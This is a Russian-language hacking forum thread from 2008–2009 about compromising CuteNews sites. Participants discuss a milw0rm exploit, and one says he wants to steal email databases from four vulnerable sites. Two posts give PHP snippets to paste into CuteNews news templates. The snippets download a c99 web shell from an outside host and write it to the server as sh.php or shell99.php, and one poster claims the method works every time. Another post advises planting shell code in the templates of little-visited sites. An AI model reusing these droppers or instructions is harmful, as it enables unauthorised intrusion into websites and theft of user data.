Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.08.2008, 08:24
|
|
Новичок
Регистрация: 27.05.2008
Сообщений: 5
Провел на форуме: 108746
Репутация:
2
|
|
тему АП
Сообщение от baltazar
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");
[...]
for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
$current_image = 'image_'.$image_i;
$image = $_FILES[$current_image]['tmp_name'];
$image_name = $_FILES[$current_image]['name'];
$image_name = str_replace(" ", "_", $image_name);
$img_name_arr = explode(".",$image_name);
$type = end($img_name_arr);
if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
$img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
}
else{ //Image is OK, upload it
хм... спойт как я понимаю этот: http://milw0rm.com/exploits/4779
куда ты там свою переделку запихал???
p.s. в наличии 4 сайта с такойже проблемой.... хочется стянуть базу мыл...
|
|
|

14.08.2008, 20:48
|
|
Новичок
Регистрация: 02.07.2008
Сообщений: 8
Провел на форуме: 49910
Репутация:
1
|
|
да такая же проблема шелл не залит в 1.4.5 думаем как картинками не идёт тупо орткрывается страница шелла и написано изображения хз чё думать подскажите чё)
|
|
|

09.11.2008, 12:31
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Вобщем допись
PHP код:
HTML;
$data=implode('',file('http://сай_дошела.ru/shell.php'));
$fp=fopen('./sh.php','wb');
fputs($fp,$data);
fclose($fp);
Создает в папке news как видите файл sh.php, это и есть ваш шел 
Работает 100% проверял на многих...
Удачи.
P.S. Только незабудьте удалить абсолютно все пробелы
Последний раз редактировалось DJ ][akep; 09.11.2008 в 17:24..
|
|
|

13.11.2008, 10:47
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
|
|
|

19.08.2009, 13:08
|
|
Новичок
Регистрация: 23.05.2007
Сообщений: 22
Провел на форуме: 70057
Репутация:
-8
|
|
Дайте мне сам сплойт =)
|
|
|

19.08.2009, 13:38
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Сообщение от DanST
Дайте мне сам сплойт =)
Поиск для кого придуман?
|
|
|

19.08.2009, 14:03
|
|
Новичок
Регистрация: 23.05.2007
Сообщений: 22
Провел на форуме: 70057
Репутация:
-8
|
|
хз
а милворм не пашет
|
|
|

19.08.2009, 15:30
|
|
Новичок
Регистрация: 26.09.2008
Сообщений: 29
Провел на форуме: 217224
Репутация:
11
|
|
Если ресурс малопосещяем то просто в шаблоны всунь код шела или форму загрузки и с помощью её залей шелл.
|
|
|

20.08.2009, 15:56
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме: 2253612
Репутация:
94
|
|
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на
HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);
ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
|
|
|

27.08.2009, 11:24
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 1
Провел на форуме: 14056
Репутация:
0
|
|
Сообщение от SEWERN
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на
HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);
ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
вот что получается Warning: file_get_contents(http://suchechka.freehostia.com/c99.txt) [function.file-get-contents]: failed to open stream: Permission denied in /usr/home/hosting/esport/ogel2008/admin/data/Default.tpl on line 5
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
CuteNews
|
ZweR |
PHP, PERL, MySQL, JavaScript |
2 |
08.02.2008 14:22 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|